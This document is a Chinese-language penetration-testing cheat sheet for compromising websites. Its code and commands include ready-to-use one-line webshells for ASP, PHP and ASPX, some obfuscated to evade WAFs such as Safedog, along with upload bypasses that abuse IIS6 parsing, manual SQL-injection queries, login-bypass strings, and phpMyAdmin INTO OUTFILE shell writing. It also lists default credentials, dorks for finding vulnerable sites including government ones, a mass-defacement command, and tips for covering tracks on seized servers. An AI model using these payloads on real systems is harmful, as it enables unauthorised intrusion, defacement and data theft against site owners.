渗透测试笔记大全_黑客秘笈-渗透测试实用指南

【 拿shell 】
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马，不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上传图片木马遇到拦截系统，连图片木马都上传不了，记事本打开图片木马在代码最前面加上gif89a，一般就能逃过拦截系统了。
3.上传图片木马把地址复制到数据库备份里备份成asp木马，有时不成功就利用IIs6.0解析漏洞尝试突破。
4.上传图片木马再用抓包工具进行抓包，用明小子的综合上传功能，复制上传地址及cookies填到对应的框里，点击上传即可。

5.当后台有数据库备份蛋没有上传点时，把一句话木马插到任意处，再到数据库备份里备份成asp木马，之后用一句话客户端连接木马即可。

6.后台点击修改密码，新密码设置为：1″:eval request(“h”)’设置成功后连接asp/config.asp即可拿下shell
7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞，复制地址放到明小子里上传，一般都能直接拿下shell。
8.当后台没有数据库备份但有数据库恢复的情况下，请不要犹豫，数据库恢复跟数据库备份功能是一样的，直接邪恶吧。
9.如果知道网站的数据库是asp的，直接在前台找留言板插入一句话木马，连接配置文件inc/config.asp即可拿下shell。
10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点，有的话直接上传asp木马以及利用iis6.0解析漏洞，不行就抓包用明小子上传。
11.先上传一个.ashx的文件，在笔记里搜索可找到方法，结果是访问会生成一句话木马文件，后台上传、编辑器上传、上传漏洞页面均可使用此方法。
12.当页面提示只能上传jpg|gif|png等格式的时候，右键查看源文件，本地修改为asp|asa|php再本地上传即可拿下shell。
13.当用啊D检测注入点提示SA权限或DB权限的时候，尝试列目录找到网站物理路径，再点击cmd/上传，直接上传asp木马即可，不行就差异备份拿shell。
14.对于一些上传漏洞的上传页面，以及后台找到的上传页面，可以尝试用本地双文件上传突破，第一个选jpg第二个选cer，推荐使用火狐浏览器。

=================================================================================================================================================

【 渗透技巧 】
1.某些cms的网站设置过滤不严，直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。
2.提下服务器之后建议抓下管理员哈希值，然后删除所有用户包括自己的，以后登录这台服务器就用管理员的账号密码登录，这样比较安全。
3.入侵网站之前连接下3389，可以连接上的话先尝试弱口令，不行就按5次shift键，看看有没有shift后门。
4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里，选择浏览器-拦截跳转勾选–查看即可直接进入后台。
5.突破防盗链系统访问shell代码：javascript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp’>fuck</a>”) 点击GO即可进入shell。
6.遇到一流信息监控拦截系统时，上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。
7.eweb编辑器后台，增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了，尝试增加一个aaspsp，再上传asp就会解析了。
8.用注入工具猜解到表段却猜解不到字段的时候，到网站后台右键查看源文件，一般账号密码后面的就是字段，之后在注入工具里添加字段进行猜解即可。
9.当注入工具猜解表段，但猜解字段时提示长度超过50之类，不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之后，使用SQL语句在ACCESS数据库里加个用户名及密码的语句：Insert into admin(user,pwd) values(‘jianmei’,’daxia’)
11.当获得管理员密码却不知道管理员帐号时，到网站前台找新闻链接，一般“提交者”“发布者”的名字就是管理员的帐号了。
12.爆破ASP+IIS架设的网站web绝对路径，假设网站主页为：http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/，fkbhvv.aspx是不存在的。
13.有的站长很懒什么也不改，当我们得知网站的cms的时候，不妨去下载一套找找数据库路径，以及敏感信息，再尝试默认相关的可利用资源。
14.菜刀里点击一句话木马右键，选择虚拟机终端，执行命令出现乱码时，返回去设置编码那里，将默认的GB2312改为UTF-8.
15.入侵千万别忘了ftp，试试诺口令，ftp的默认端口：21  默认帐号密码：test
16.激活成功教程出md5为20位结果，只需要把前三位和后一位去掉，剩余16位拿去解密即可
17.好多网站的后台地址是：admin_index.asp manage_login.asp
18.有时在木马代码里加上了gif89a，上传成功访问的时候却出现了像图片一样的错误图像，说明服务器把gif89a当做图片来处理了，不要带gif89a即可。问就可以了。
19.找eweb编辑器的时候，如果默认的被改了，到前台去找图片右键看下路径，根据图片的目录猜eweb编辑器的目录，后台也是用此思路。
20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\  
21.扫旁站的时候，是不是想看每个站点是什么cms呢？用轩辕剑扫描就可以显示系统特征。
22.网站的主站一般都很安全，这时就要旁注或C段了，但是想知道各个IP段开放了什么端口吗？用“啊D网络工具包”里面的IP端口扫描最理想了。
23.手工检测注入点弹出“你的操作已被记录!”之类的信息，访问这个文件：sqlin.asp，如果存在，在注入点后面植入一句话木马：‘excute(request(“TNT”))
接着用一句话木马客户端连接：http://www.xxx.com/sqlin.asp，上传木马即可拿下shell，因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.有的后台不显示验证码，往注册表里添加一个ceg即可突破这个困境了，把下面的代码保存为Code.reg，双击导入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
“BlockXBM”=dword:00000000
25.内网渗透时尽量少登录3389，以免被管理员发现；

26.旁注的时候，建议挑php的站点来日，因为php站点一般都支持aspx脚本，这样对于提权跟跨目录都轻松.!
=================================================================================================================================================

【 手工注入 】
IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉，否则不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的信息。
手工注入时如果网站过滤了 and 1=1  and 1=2 ，可以用xor 1=1  xor 1=2 进行判断。

第一步：找注入点
（数字型）http://www.xxx.com/show.asp?id=7
加’           程序报错
加and 1=1     返回正常页面
加and 1=2     返回错误页面

（字符型）http://www.xxx.com/show.asp?id=ade7
加’            程序报错
加’and ‘1’=’1  返回正常页面
加’and ‘1’=’2  返回错误页面

新型检测注入点的方法：
在URL地址后面加上-1，若返回的页面和前面不同，是另一个正常的页面，则表示存在注入漏洞，而且是数字型的注入漏洞。
在URL地址后面加上-0，若返回的页面和之前的页面相同，然后加上-1，返回错误页面，则也表示存在注入漏洞，而且是数字型的。

如果报错提示这个：
Microsoft JET Database Engine 错误 ‘80040e14’
语法错误 (操作符丢失) 在查询表达式 ‘ID = 6 ord by’ 中。
/fun/Function.asp，行 657

解明：通过 JET 引擎连接数据库，则是 Access数据库，通过 ODBC 引擎连接数据库，则是 MSSQL数据库。

第二步：猜字段数
语句：order by 5
如果猜6的时候返回出错，就继续往回猜，直到返回正确为止…

第三步：UNION命令
语句：and 1=2 union select 1,2,3,4,5–
看看哪里可以替换，假如显示有2，就在2这里替换SCHEMA_NAME，见下

第三步：猜库名
语句：and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1

第四步：猜表段
语句：and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意，TABLE_SCHEMA=后面的库名必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有表段，然后选最可能性的那个。

第五步：猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意，TABLE_SCHEMA=后面的表段必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有字段，然后选最可能性的那两个。

第六步：猜内容
语句一：and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先让程序报错，所以在注入点后面加上 and 1=2
语句二：http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同样是先让程序报错，在178这个参数前面加上 –
当列名帐号跟列名密码都猜解对的时候，页面将会显示相对应的内容，一般的密码都经过MD5加密了，解密地址：http://www.cmd5.com/ ;  UserName  Password
=================================================================================================================================================

【 常见网站程序 】
asp类：
foosun(风讯)
kesion(科汛)

newasp(新云)
乔客

CreateLive(创力)
5uCMS

KingCMS
   
DvBBS(动网)
BBSxp

[博客]zblog
[博客]pjblog

PHP类：

DeDeCms（织梦）

ECMS（帝国）

PHPCMS
PHP168
HBcms（宏博）

SupeSite
CMSware(思维)

Joomla!
   
[BBS]Discuz!
[BBS]phpWind

[SNS]UCenterHome
[SNS]ThinkSNS

[商城]EcShop
[商城]ShopEx

[博客]WordPress   

[维基]HDWiki
[微博]PHPsay

[DIGG]PBdigg

( php开源mysql绝对路径 )
开源系统             数据库配置文件名                  文件名所在的目录
Discuz!              config.inc.php                    ./ config.inc.php
Phpcms               config.inc.php                    ./include/config.inc.php
Wodpress             wp-config.php                     ./ wp-config.php
Phpwind              sqlconfig.php                     ./data/sqlconfig.php
phpweb               config.inc.php                    ./config.inc.php
Php168v6             mysql_config.php                  ./php168/ mysql_config.php
Shopex               config.php                        ./config/config.php
Ecshop               config.php                        ./data/config.php
Joomla               configuration.php                 ./ configuration.php
UCenter              config.inc.php                    ./data/config.inc.php
EmpireCMS            config.php                        ./e/class/config.php
Dedecms              common.inc.php                    .data/common.inc.php
Zen Cart             configure.php                     ./includes/configure.php
Mediawiki            localsettints.php                 ./config/localsettints.php
Ecshop               config.php                        ./data/config.php
osCommerce           configure.php                     ./includes/configure.php

=================================================================================================================================================

【 谷歌黑客语法 】
site：可以限制你搜索范围的域名.
inurl：用于搜索网页上包含的URL，这个语法对寻找网页上的搜索，帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)
intitle: 查包含关键词的页面，一般用于社工别人的webshell密码
filetype：搜索文件的后缀或者扩展名
intitle：限制你搜索的网页标题.
link: 可以得到一个所有包含了某个指定URL的页面列表.
查找后台地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容：site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点：site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞：site:域名 inurl:file|load|editor|Files
找eweb编辑器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库：site:域名 filetype:mdb|asp|#
查看脚本类型：site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵：inurl:cms/data/templates/images/index/
利用谷歌黑客快速找到自己想要的资料：site:qiannao.com 提权视频

=================================================================================================================================================

【 一句话木马 】
asp一句话木马：<%eval request(“x”)%>
php一句话木马：<?php eval($_POST[g]);?>
aspx一句话：<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>
数据库加密一句话(密码a)：┼攠數畣整爠煥敵瑳∨≡┩愾
网站配置、版权信息专用一句话：”%><%Eval Request(x)%>
一句话再过护卫神：<%Y=request(“x”)%> <%execute(Y)%>
过拦截一句话木马：<% eXEcGlOBaL ReQuEsT(“x”) %>
asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%
能过安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话：<%Y=request(“x”)%> <%eval(Y)%>
elong过安全狗的php一句话：<?php  $a = “a”.”s”.”s”.”e”.”r”.”t”;  $a($_POST[cc]);  ?>

后台常用写入php一句话（密码x）：
<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);
@fclose($fp);
?>

高强度php一句话：
<?php substr(md5($_REQUEST[‘heroes’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>

新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话：
<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破护卫神，保护盾一句话：
<?php $a = str_replace(x,””,”axsxxsxexrxxt”);
$a($_POST[“test”]); ?>

许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。
改成：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉
这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是一样的。

PHP高强度一句话：
<?php substr(md5($_REQUEST[‘x’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>   菜刀连接：/x.php?x=lostwolf  脚本类型：php  密码：c
<?php assert($_REQUEST[“c”]);?>    菜刀连接 躲避检测 密码：c

=================================================================================================================================================

【 解析漏洞总结 】
IIS 6.0
目录解析：/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g. xx.txt)，文本内容为后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析：/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
默认解析：/xx.asa    /xx.cer   /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/IIS 7.5/Nginx <8.03
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾
e.g.  
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本。
.然后就在图片目录下生成一句话木马 shell.php 密码 cmd

=================================================================================================================================================

【 ewebeditor编辑器 】
默认后台：ewebeditor/admin_login.asp
帐号密码：admin admin
样式设计：ewebeditor/admin_style.asp
查看版本：ewebeditor/dialog/about.html
数据库路径：db/ewebeditor.mdb    db/%23ewebeditor.mdb    db/%23ewebeditor.asp  ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)
遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..
跳转目录：ewebeditor/admin_uoloadfile.asp？id=14&dir=..  (dir为列目录, ..为返回上层目录)，形式:dir ../..
点上传文件管理-随便选择一个样式目录，得到：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

( ewebeditor5.5版本 )
默认后台：ewebeditor/admin/login.asp
帐号密码：admin  198625
数据库路径：data/%23sze7xiaohu.mdb
遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../
调用样式上传页面：ewebeditor/ewebeditor.htm?id=body&style=popup

( ewebeditor3.8 php版本 )
默认后台：eWebEditor/admin/login.php
首先随便输入一个帐号和密码，接着系统会提示出错，这时清空浏览器的url，然后输入以下代码后连按三次回车键：
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));  
接着访问文件：ewebeditor/admin/default.php  就可以直接进入后台了。

( ewebeditor编辑器exp手册 )

有时候什么后缀都上传了，还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

一：文件上传成功了，但是访问不成功，说明该目录(比如：/UploadFile)被设置了权限，返回去换成/ 上传到根目录就行了.增加asp等不行的时候，可以利用解析asp;jpg

二：下载数据库查看前人留下的痕迹，再访问上传页面拿shell。
页面路径：/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目，把S_ID跟S_Name的值替换在语句里访问，上传相对应的格式木马。
=================================================================================================================================================

【 fckeditor编辑器 】
查看版本：fckeditor/editor/dialog/fck_about.html         
编辑器页面：FCKeditor/_samples/default.html
上传页面：fckeditor/editor/filemanager/connectors/test.html
遍历目录：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
编辑页面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法总结 )
ASPX的站几乎都用fck编辑器，建议用工具扫一下，记住inc目录下可能存在fck编辑器，扫下这个目录。
一：如果是iis6.0，上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录，再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell
二：第一次上传1.asp;1.jpg，被重命名为：1_asp;1.jpg，但是第二次上传1.asp;1.jpg，就有可能变成：1.asp;1(1).jpg
三：iis7.5+fck的解析文件为：a.aspx.a;.a.aspx.jpg..jpg.aspx
四：如果不是iis6.0 上传1.asp;jpg然后抓包，接下来改包，将分号变成空格，再用c32把20改成00，保存，利用%00 截断分号两次
五：成功访问别人的一句话木马页面，http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg  但不知道密码
http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马，没有成功利用iis6.0解析漏洞还是图片，下载下来用记事本打开找到密码。
六：IIS7.0/7.5 通杀oday，把php一句话木马后缀改成1.jpg传上去，找出一句话的路径后，在1.jpg的后面添加/.php  例如：/.php

( 建立文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包，从而达到突破的目的。
注意：安装Fiddler web debugger，需要安装.net环境以及.net的SP2补丁方可运行！
1.打开fck的上传页面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html
2.再打开Fiddler web debugger这款工具，点击设置–自动断点–选择 “请求之前”
3.接着打开fck的上传页面，创建文件夹，并输入你想要创建的文件名，例如：x.asp
4.然后返回到Fiddler web debugger这款工具里，选择链接–点击右侧的嗅探
5.修改currentfolder内的参数，改成你要建立的文件夹名字，如：x.asp
6.然后点击右侧的：run to completion
7.再点击软件设置–自动断点–禁用，再到浏览器里点击确定建立文件夹，你就会发现文件夹建立为x.asp了

=================================================================================================================================================

【 linux 】
解析格式：1.php.xxx (xxx可以是任意)
如果apache不认识后缀为rar的文件，我们就用1.php.rar格式上传，文件就会被服务器当做PHP脚本解析。
辨别linux系统方法，例如：http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问，如果出错了，就说明是linux系统，反之是windows系统.

=================================================================================================================================================

【 旁注 】
旁注的技巧就是挑选支持aspx的站来日，这样提权时候希望较大，如何探测服务器上哪些站点支持aspx呢? 利用bing搜索：http://cn.bing.com/ 搜索格式：ip:服务器ip aspx
比如要入侵一个网站，想知道该网站支不支持aspx，就在网站后面随便加上一个xxx.aspx回车，如果显示的不是iis默认的错误页面，而是这种：“/”应用程序中的服务器错误，说明支持aspx马。

=================================================================================================================================================

【 phpmyadmin 】
查看版本：test.php 或 phpinfo.php
默认账号密码：root root
万能帐号密码：’localhost’@’@” 密码空
拿shell第一种方法：
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS `darkmoon`;

拿shell第二种方法：
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第三种方法：
select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第四种方法
select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \'</pre>\’; ?>’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user
找到mysql数据库，执行sql语句即可写入一句话，再菜刀连接即可。

phpmyadmin脱裤：在这里面是可以直接拖库的，如同上传php拖库脚本一样，操作差不多的。

修改mysql默认的root用户名方法:
进入phpmyadmin,进入mysql表,执行sql语句
1.update user set user=’你的新root用户名’ where user=’root’;  
2.flush privileges;
例如：
用root身份登入，进入mysql库，修改user表即可。
1.use mysql;  
2.  
3.mysql>update user set user=’newName’ where user=’root’;  
4.  
5.mysql> flush privileges;
=================================================================================================================================================
【 万能密码 】
( php )
帐号：’ UNION Select 1,1,1 FROM admin Where ”=’
密码：1

( asp )
‘xor
‘or’=’or’
‘or”=”or”=’
‘or ‘1’=’1’or ‘1’=’1
‘or 1=1/*
=================================================================================================================================================

【 批量关键词 】
inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id=           牛比
inurl:show.asp? 非常强大！！！！
site:www.yuming.com
inurl:articleshow.asp?articleid=数字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?

=================================================================================================================================================

【 批量挂黑页 】
cmd命令执行 dir d:\wwwroot /b >>1.txt
之后命令 for /f “tokens=* delims= ” %i in (d:\1.txt) do echo pause>>D:\wwwroot\%i\wwwroot\1.txt

=================================================================================================================================================
【 木马后门 】
1.TNTHK小组内部版 —— 存在关键词后门，随便输入一个错的密码，右键查看源文件，找到错误关键词后面的font，在font后面的就是正确密码。
2.不灭之魂—不死僵尸变种 —— 用这款工具专门爆这款大马的密码：爆不灭之魂密码
3.终极防删免杀多功能VIP版本-无后门 —— 万能密码：wbgz   菜刀连接：kk

=================================================================================================================================================

【 安全狗 】
1.过注入
方法一：a.asp?aaa=%00&id=sql语句
方法二： a.asp?id=sql语句   里面把安全过滤的加个%l 比如： un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问
方法一：上传一个大马 然后访问http://sss.com/dama.asp ; 访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传，然后在同目录上传个文件da.asp 内容为： <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。

3.过菜刀连接一句话被拦截
方法一：不用菜刀连接一句话，用别的一句话连接端。
方法二：中转下连接菜刀，把过滤掉的词替换掉。

=================================================================================================================================================

【 asp搜索框注入 】
在搜索框里，我们输入一个关键词，该关键词必须在这个站能搜索到信息。比如这个站我输入了1，搜索到了很多新闻，判断这个搜索框是否有注入漏动。
直接在前台的搜索框里注入被限制的话，可以本地构造表单进行注入：
<html>
<form name=”form1″ method=”post” action=”http://www.xxx.com/search.asp”>
  类型：
  <label>
  <input name=”t” type=”text” id=”t” value=”1″>
  </label>
  <p>
    内容：
      <label>
    <input name=”key” type=”text” id=”key”>
    </label>
  </p>
  <p>
<label>
    <input type=”submit” name=”Submit” value=”提交”>
    </label>
  </p>
</form>

1%’ ‘ and ‘%’=’         系统报错
1%’ and 1=1 and ‘%’=’   返回正确
1%’ and 1=2 and ‘%’=’   返回错误
1%’ and (select count(*) from 表段) and ‘%’=’   猜表段
1%’ and (select count(字段) from 表段) and ‘%’=’  猜字段
1%’ and (select top 1 len(字段) from 表段)>16 and ‘%’=’  猜字段长度
1%’ and (select top 1 asc(mid(name,1,1)) from 表段)>97 and ‘%’=’   猜内容
用牛族字符转换器转换数字。（猜长度的时候，选择对的前面那个错的数字！或是直接把大于号改为等于号，看看正确就是了）
有的网站存在搜索框，利用这个搜索框进行注射从而爆出管理帐号密码：%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’
我们在搜索框里，搜索关键词1浏览器地址栏显示：http://www.XXXXXX.com/News_search.asp?key=1&otype=msg
这里的key=1，就是说我们搜索得关键词1，我们要做的就是把key=1放到最后面，把连接变成：http://www.XXXXXX.com/News_search.asp?otype=msg&key=1
或者直接把&otype=msg删除，变成：http://www.XXXXXX.com/News_search.asp?key=1

=================================================================================================================================================

【 本地构造上传漏洞  】
寻找程序上传漏洞，必须从上传页面的源文件入手，目标有两个：
1.filename (文件名称)  在上传页面中针对文件扩展名过滤不严，从而上传可执行的脚本木马。
2.filepath (文件路径)  在上传页面针对路径过滤不严，导致可以修改上传相对路径上传脚本木马。
当检测到一个上传页面，asp、asa后缀已经被过滤掉的时候，可以尝试抓包明小子或NC上传！
不行就利用本地上传漏洞构造上传！例如上传页面是：http://www.baidu.com/upfile_other.asp
1.右键查看源文件，找到这段代码：<form name=”form1″ method=”past” action=”zwhua_upload1.asp” enctype=”multipart/form-data”>
  把以上代码中actino处的路径补全！即：<form name=”form1″ method=”past” action=”http://www.xxx.com/zwhua_upload1.asp” enctype=”multipart/form-data”>
2.再找到这段代码：<input type=”hidden” name=”filepath” value=”uploadfile/”>
  利用IIS6.0解析漏洞，把以上代码中value处的文件补全！即：<input type=”hidden” name=”filepath” value=”uploadfile/1.asa; “>  注意：冒号后面有空格！
3.接着保存为1.html，将刚保存的文件拖进去C32里，选择十六进制模式，找到“1.asa; ”后面的空格，将其填充为00后保存退出！
4.本地打开上传图片格式的木马(不成功时可以尝试上传一句话木马) ，如果提示成功后不显示路径的话，可以右键查看源文件自己手工找出路径访问即可！

=================================================================================================================================================

【 利用双文件上传拿shell 】
因为网站只判断一次，如果第一个文件后缀是在白名单里面的话，就让其上传，并没有判断第二个文件，所以上传任意格式的文件也让其通过。
当系统验证cookie的时候，就要用到火狐浏览器了，登录网站进后台，让火狐浏览器保存管理员的cookie值，再把修改后的“双文件上传工具”拖进去上传。
1.在后台找上传点，右键查看源文件，找到上传地址，一般在post或action的附近，搜索即可找到，一般为：src=”../xxx.htm”  之后补全路径访问。
2.这个还不是真正的上传页面，真正的上传页面后缀是asp的，继续查看源代码，找到action=”xxx.asp”，补全路径访问即可！
4.其实也可以抓包从而获得上传路径，抓包之后，在Referer:这栏，还有常见的是：htto://www.xxxx.com/upfile_other.asp
3.打开双文件上传工具，替换为当前的上传地址，保存后拖进火狐浏览器里，第一个选择jpg木马，第二个选择cer木马，提交后右键查看源文件找出路径即可。

=================================================================================================================================================

【 数据库备份抓包改包NC提交拿shell 】
当备份路径不能修改,后缀又是mdb不变的时候，我们可先对备份的过程进行抓包，再本地构造用NC提交即可突破备份，数据库恢复也可使用此方法！
在抓包的时候，最好用火狐浏览器，因为有的浏览器抓不到包，首先上传一张图片木马复制下地址，接着对备份过程进行抓包！把抓到的数据复制在文本里面！
开始本地修改，先把POST处补全网址，找到最底下的一行数据，再复制多一行对比长度进行修改，把备份的数据名称替换为木马地址，备份的名称改为自己想要的asp后缀！
再将原来的数据长度跟现在的对比同时替换掉，最后看一共增加了多少个字符，就在Content-Length:处进行增减，用NC提交数据格式：nc 域名 80<1.txt

=================================================================================================================================================

【 本地构造数据库备份突破拿shell 】
当上传jpg木马得到路径前去备份时，发现数据库备功能用不了的情况下，可以尝试本地构造突破拿shell！
首先查看源文件，找到“当前数据库路径”修改为刚上传jpg木马的路径，再找到“数据库备份名称”修改为1.asa
找到“<form method=”past” action=”Backup.asp?action=Backup”>” 将路径补全“<form method=”past” action=”http://xxx.com/admin/Backup.asp?action=Backup”>”
最后保存为1.html，有的网站不验证cookie的话，直接打开进行备份就能成功了，但是一般都需要验证cookie，这时就用上火狐浏览器了。
因为火狐浏览器有保留cookie的功能，先登录后台，以管理员的权限进行上传，直接把1.html拖进火狐浏览器里，直接点击备份即可突破cookie验证！
=================================================================================================================================================
【 本地构造限制上传类型漏洞 】
一般用于直接扫到的上传页面，名称是：上传图片，上传asp、asa等脚本时提示“请选择jpg或gif文件!”
这时通过这个方法一般都能成功，首先保存到本地1.asp  放到小旋风的目录下，然后找到以下这段代码：
    alert(“请点击浏览按钮，选择您要上传的jpg或gif文件!”)
    myform.file1.focus;
    return (false);
    }
    else
    {

    str= myform.file1.value;
    strs=str.toLowerCase();
    lens=strs.length;
    extname=strs.substring(lens-4,lens);
    if(extname!=”.jpg” && extname!=”.gif”)
    {

    alert(“请选择jpg或gif文件!”);
看到这句代码：if(extname!=”.jpg” && extname!=”.gif”)  改为：    if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)
然后补充完整上传地址，action=这里，然后网页打开127.0.0.1 直接上传asp文件就可以了。

=================================================================================================================================================

【 抓包改包NC提交拿shell 】
1.抓包数据中如果存在name=”filepath”或是name=”filename”，那么就可以满足NC的上传条件了。
2.将木马的抓包数据复制到文本文件中。例如：1.txt
3.将路径补全：
filepath截断法：
uploadfile/路径后添加1.asp空格 (16进制下面将20改为00)
filename自定义名称：
C:\Documents and Settings\lei\桌面\1.jpg (将1.jpg 改为 1.asp空格，16进制下将20改为00)
3.在Content-Length处加上../uploadfile/后增加的字节数。
4.用C32将空格的20改为00，保存为1.txt。
5.把1.txt跟nc.exe放在同一目录下，cmd命令：nc -vv www.XXXX.com 80<1.txt
( 如果上传成功后没有将木马解析成asp，可以尝试将文件名改成asa、cer、php 再不行就用IIS 6.0解析漏洞，将文件名改为1.asa;1.jpg )

=================================================================================================================================================
【 抓包nc上传获取管理权限 】
这个方法相当于cookie欺骗，首先到前台去注册一个会员，注册成功后在登录的那一刻，用抓包工具进行抓包，把抓到的数据复制到1.txt里面。
